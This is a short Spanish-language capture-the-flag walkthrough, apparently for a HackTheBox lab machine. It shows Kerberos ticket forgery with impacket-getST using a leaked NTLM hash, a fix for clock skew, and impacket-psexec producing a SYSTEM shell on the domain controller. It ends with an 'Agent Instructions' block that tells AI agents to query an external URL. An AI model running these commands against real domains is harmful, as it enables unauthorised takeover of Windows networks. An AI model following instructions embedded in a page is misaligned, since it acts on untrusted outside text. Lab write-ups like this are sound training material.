# Silver Ticket ``` impacket-getST 'intelligence.htb/svc_int$' -spn WWW/dc.intelligence.htb -hashes :c699eaac79b69357d9dabee3379547e6 -impersonate Administrator ``` Si te sale este error: ``` [*] Getting TGT for user Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) ``` Solo debes actualizar el reloj esto lo hacemos con: ``` sudo apt-get install ntpdate sudo ntpdate 10.10.10.248 => 1 Nov 05:23:45 ntpdate[295766]: step time server 10.10.10.248 offset +25202.808937 sec #OTRA OPCION sudo apt-get install chrony sudo timedatectl set-ntp true sudo ntpdate ``` Exportamos la variable del archivo generado ``` export KRB5CCNAME=Administrator.ccache ``` Obteniendo consola ``` impacket-psexec intelligence.htb/Administrator@dc.intelligence.htb -k -no-pass Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on dc.intelligence.htb..... [*] Found writable share ADMIN$ [*] Uploading file UmMXtxAq.exe [*] Opening SVCManager on dc.intelligence.htb..... [*] Creating service JzWD on dc.intelligence.htb..... [*] Starting service JzWD..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.1879] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Users\Administrator\Desktop>type root.txt xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cs.desdes.xyz/miscelanio/silver-ticket.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.